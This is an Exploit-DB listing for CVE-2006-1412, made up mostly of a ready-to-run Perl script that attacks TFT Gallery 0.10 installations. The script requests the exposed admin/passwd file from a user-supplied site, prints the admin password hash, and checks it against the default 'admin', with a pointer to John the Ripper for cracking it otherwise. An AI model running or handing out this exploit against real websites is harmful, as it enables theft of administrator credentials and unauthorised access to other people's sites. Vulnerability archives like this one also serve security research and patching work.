TFT Gallery <= 0.10 - Password Disclosure Remote Exploit

2006-03-25T00:00:00
ID EDB-ID:1611
Type exploitdb
Reporter undefined1_
Modified 2006-03-25T00:00:00

Description

TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit. CVE-2006-1412. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
###############################################################################

use strict; 
use IO::Socket;

$| = 1;
printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
	my $index = index($website, "/");
	$path = substr($website, $index);
	$site = substr($website, 0, $index);
	if(substr($path, length($path)-1) ne "/")
	{
		$path .= "/";
	}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n\r\n";


my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
my $data = sendpacket($site, $packet1.$eop);

if($data !~ /HTTP\/1.1 200 OK/)
{
	die "failed to retrieve the admin password\n";
}

my $password = "";
if (index($data, "\r\n\r\n") != -1)
{
	$password = substr($data, index($data, "\r\n\r\n")+4);
	chomp $password;
}
else
{
	die "failed to retrieve the admin password\n";
}

print "The password hash is: '$password'\n";
if(crypt("admin","tftgallery") eq $password)
{
	print "The plaintext password is: 'admin'\n";		
}
else
{
	die "Use john the ripper, luke!\n";
}




sub sendpacket(\$,\$) {
	my $server = shift;
	my $request = shift;

	my $sock = IO::Socket::INET-&gt;new(Proto =&gt; "tcp", PeerAddr =&gt; $server, PeerPort =&gt; "80") or die "[-] Could not connect to $server:80 $!\n";
	print $sock "$request";

	
	my $data = "";
	my $answer;
	while($answer = &lt;$sock&gt;)
	{
		$data .= $answer;
	}
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s &lt;website&gt; [password]\n", $0;
	printf "ex. : %s www.site.com/tftgallery/\n", $0;
	exit;
}

# milw0rm.com [2006-03-25]